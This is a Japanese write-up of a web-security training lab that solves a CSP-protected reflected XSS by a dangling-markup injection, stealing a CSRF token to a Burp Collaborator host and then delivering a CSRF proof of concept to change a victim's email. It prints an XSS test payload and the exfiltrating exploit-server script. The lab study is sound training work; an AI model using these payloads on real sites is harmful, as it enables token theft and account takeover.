Hello there, ('ω')ノ
CSPで保護された反射型XSS、ぶら下がりマークアップ攻撃を。
このラボは、CSPを使用してXSS攻撃を軽減して。
CSRFトークンを盗んで、別ユーザのメールアドレスを変更する。
ダングリングマークアップ攻撃を実行せよと。
まずは、ログインして。
メールアドレスを変更して。
リクエストをリピータへ。
下記のペイロードを挿入して動作とCSPの確認を。
"><img src=x onerror=alert(1)>
Followして。
まずは、コラボレータを起動してURLをコピーして。
下記のスクリプトをエクスプロイトサーバへ。
<script>
location='https://ac1c1fe01ebe941f800b402000ea001e.web-security-academy.net/my-account?email=%22%3E%3Ctable%20background=%27//pohuavjwrcun1wulypj3mism4da4yt.burpcollaborator.net?';
</script>
Storeして、Viewでページを確認してからエクスプロイトサーバでDeliverを。
コラボレータでHTTPをキャッチしてcsrfをデコードへ。
下記のようにデコードして。
g4NZqAM51E3PljT20VEFM9DLRF4QNLgu
ターゲットユーザがラボのWebサイトにログインしたままで。
悪意のあるスクリプトを含むWebサイトにアクセスすると。
ブラウザは、CSRFトークンを含む要求を悪意のあるWebサイトに送信して。
その後、このトークンを盗むことができるので。
まずは、インターセプトをオンにしてからでメールアドレスの変更を。
右クリックでCSRF PoCを。
リクエストはDropしてからインターセプトをオフにしておいて。
Optionをチェックして。CSRFトークンを書き換えて。
確認のためにメールアドレスも変更しておいてからRegenerateを。
HTMLをコピーして。
コピーしたHTMLを貼り付けて、SaveしてDeliverすると。
クリアできた。
Best regards, (^^ゞ
